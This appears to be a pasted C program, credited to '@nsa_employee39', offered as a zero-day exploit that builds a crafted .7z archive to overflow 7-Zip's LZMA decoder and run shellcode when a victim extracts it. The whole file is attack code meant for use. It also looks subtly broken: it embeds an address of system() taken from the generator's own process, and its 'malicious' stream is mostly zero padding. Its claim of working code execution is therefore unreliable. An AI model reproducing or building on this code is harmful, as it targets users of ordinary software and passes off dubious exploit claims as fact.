Mog

1. // by @nsa_employee39
2.  
3. // This exploit targets a vulnerability in the LZMA decoder of the 7-Zip software. It uses a crafted .7z archive with a malformed LZMA stream to trigger a buffer overflow condition in the RC_NORM function. By aligning offsets and payloads, the exploit manipulates the internal buffer pointers to execute shellcode which results in arbitrary code execution. When the victim opens/extracts the archive using a vulnerable version (current version) of 7-Zip, the exploit triggers, executing a payload that launches calc.exe (You can change this).
4.  
5. // offsets might need to be adjusted!!!
6.  
7.  
8. #include "LzmaEnc.h"
9. #include "LzmaDec.h"
10. #include "7z.h"
11. #include "7zAlloc.h"
12. #include "Xz.h"
13. #include "XzEnc.h"
14. #include "7zFile.h"
15. #include "7zStream.h"
16. #include "CpuArch.h"
17.  
18. #include <stdio.h>
19. #include <string.h>
20. #include <stdlib.h>
21.  
22. static void WriteUInt32LE(unsigned char* buf, UInt32 value) {
23.     buf[0] = (Byte)(value & 0xFF);
24.     buf[1] = (Byte)((value >> 8) & 0xFF);
25.     buf[2] = (Byte)((value >> 16) & 0xFF);
26.     buf[3] = (Byte)((value >> 24) & 0xFF);
27. }
28.  
29. static void WriteUInt64LE(unsigned char* buf, UInt64 value) {
30.     buf[0] = (Byte)(value & 0xFF);
31.     buf[1] = (Byte)((value >> 8) & 0xFF);
32.     buf[2] = (Byte)((value >> 16) & 0xFF);
33.     buf[3] = (Byte)((value >> 24) & 0xFF);
34.     buf[4] = (Byte)((value >> 32) & 0xFF);
35.     buf[5] = (Byte)((value >> 40) & 0xFF);
36.     buf[6] = (Byte)((value >> 48) & 0xFF);
37.     buf[7] = (Byte)((value >> 56) & 0xFF);
38. }
39.  
40. int main() {
41.     unsigned char shellcode[] = {
42.         0x55, 0x89, 0xE5, 0x83, 0xEC, 0x08, 0xC7, 0x04, 0x24,
43.         'c', 'a', 'l', 'c', 0x00, 0xCC, 0xCC, 0xCC, 0x89, 0xEC, 0x5D, 0xC3
44.     };
45.  
46.     size_t shellcodeSize = sizeof(shellcode);
47.     UInt32 addressOfSystemOffset = 0x39;
48.     UInt32 jmpOffset = (UInt32)((unsigned char*)&system - ((unsigned char*)shellcode + addressOfSystemOffset + 4));
49.     WriteUInt32LE(shellcode + 18, jmpOffset);
50.  
51.     unsigned char malicious_lzma_stream[] = {
52.         0x5D, 0x00, 0x00, 0x00, 0x01, 0x00,
53.         0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
54.         0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
55.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
56.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
57.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
58.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
59.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
60.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
61.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
62.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
63.         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
64.     };
65.  
66.     unsigned char header[] = {
67.         '7', 'z', 0xBC, 0xAF, 0x27, 0x1C, 0x00, 0x04, 0x03, 0x5B, 0xA8, 0x6F,
68.         0x25, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
69.     };
70.  
71.     unsigned char lzma_props[] = { 0x5D, 0x00, 0x00, 0x00, 0x01, 0x00 };
72.  
73.     size_t payloadSize = sizeof(header) + sizeof(lzma_props) + sizeof(malicious_lzma_stream) + sizeof(shellcode);
74.     unsigned char *payload = (unsigned char *)malloc(payloadSize);
75.  
76.     unsigned char *p = payload;
77.     memcpy(p, header, sizeof(header)); p += sizeof(header);
78.     memcpy(p, lzma_props, sizeof(lzma_props)); p += sizeof(lzma_props);
79.     memcpy(p, malicious_lzma_stream, sizeof(malicious_lzma_stream)); p += sizeof(malicious_lzma_stream);
80.     memcpy(p, shellcode, sizeof(shellcode));
81.  
82.     FILE *f = fopen("exploit.7z", "wb");
83.     if (!f) {
84.         perror("Failed to create exploit.7z");
85.         return 1;
86.     }
87.  
88.     fwrite(payload, 1, payloadSize, f);
89.     fclose(f);
90.  
91.     free(payload);
92.     return 0;
93. }
94.